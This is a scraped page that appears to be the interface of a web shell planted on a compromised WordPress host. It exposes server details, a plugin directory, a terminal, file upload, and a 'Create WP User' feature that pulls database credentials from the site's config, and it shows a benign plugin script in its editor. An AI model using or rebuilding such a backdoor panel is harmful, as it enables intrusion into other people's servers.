Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
www
/
wordpress
/
wpn_OciepleniaKonin
/
wp-content
/
plugins
/
pirate-forms
/
public
/
js
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
custom-spam.js
1.25 KB
-rw-r--r--
2018-07-26 22:33
scripts-general.js
881.00 B
-rw-r--r--
2018-03-21 12:05
scripts.js
1.16 KB
-rw-r--r--
2018-03-21 12:05
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
scripts.js
/* global jQuery */ jQuery( document ).ready( function () { 'use strict'; jQuery( '.pirate-forms-file-upload-button' ).on( 'click', function () { var $button = jQuery( this ); $button.parent().find( 'input[type=file]' ).on( 'change', function () { $button.parent().find( 'input[type=text]' ).val( jQuery( this ).val() ).change(); } ); $button.parent().find( 'input[type=file]' ).focus().click(); } ); jQuery( '.pirate-forms-file-upload-input' ).on( 'click', function () { jQuery( this ).parent().find( '.pirate-forms-file-upload-button' ).trigger( 'click' ); } ); jQuery( '.pirate-forms-file-upload-input' ).on( 'focus', function () { jQuery( this ).blur(); } ); } ); jQuery( window ).load( function () { 'use strict'; if ( jQuery( '.pirate_forms_wrap' ).length ) { jQuery( '.pirate_forms_wrap' ).each( function () { var formWidth = jQuery( this ).innerWidth(); var footerWidth = jQuery( this ).find( '.pirate-forms-footer' ).innerWidth(); if ( footerWidth > formWidth ) { jQuery( this ).find( '.contact_submit_wrap, .form_captcha_wrap, .pirateform_wrap_classes_spam_wrap' ).css( {'text-align' : 'left', 'display' : 'block' } ); } } ); } } );
关闭
保存